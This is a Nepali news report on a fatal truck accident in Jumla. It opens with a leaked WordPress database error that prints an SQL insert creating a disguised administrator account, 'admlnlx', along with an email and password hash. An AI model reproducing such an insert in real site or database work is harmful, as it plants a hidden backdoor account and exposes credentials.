WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/Px.x85dFRzHhjdJad5k9vTkub3Gg0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-31 19:25:33', '', 'admlnlx', 'admlnlx')
जुम्ला, फागुन ५-
जुम्लामा आज बिहान मिनि ट्रक पल्टिँदा तीन जनाको मृत्यु भएको छ । र एक घाईते भएका छन् ।
नाग्मबाट सिंजा गोठिज्यूला जादै गरेको ना ४ ख ९२७२ नम्बर मालवाहक ट्रक सिंजा वड्की – २ को देयारगाउंमा पल्टीएको जिल्ला प्रहरी कार्यालयले वताएको छ । घटनास्थलमा तिर्थराम चौधरीको चालक अनुमति पत्र फेला परेपनि मृतक सवैको सनाखत भने हुन नसकेको प्रहरीले जनाएको छ । ट्रक पल्टिएको खवर प्राप्त भएपछि नराकोट प्रहरी चौकीवाट प्रहरी घटनास्थलमा पठाइएको प्रहरी नायव उपरिक्षक गुरुविष्णु काफ्लेले जानकारी दिनुभयो ।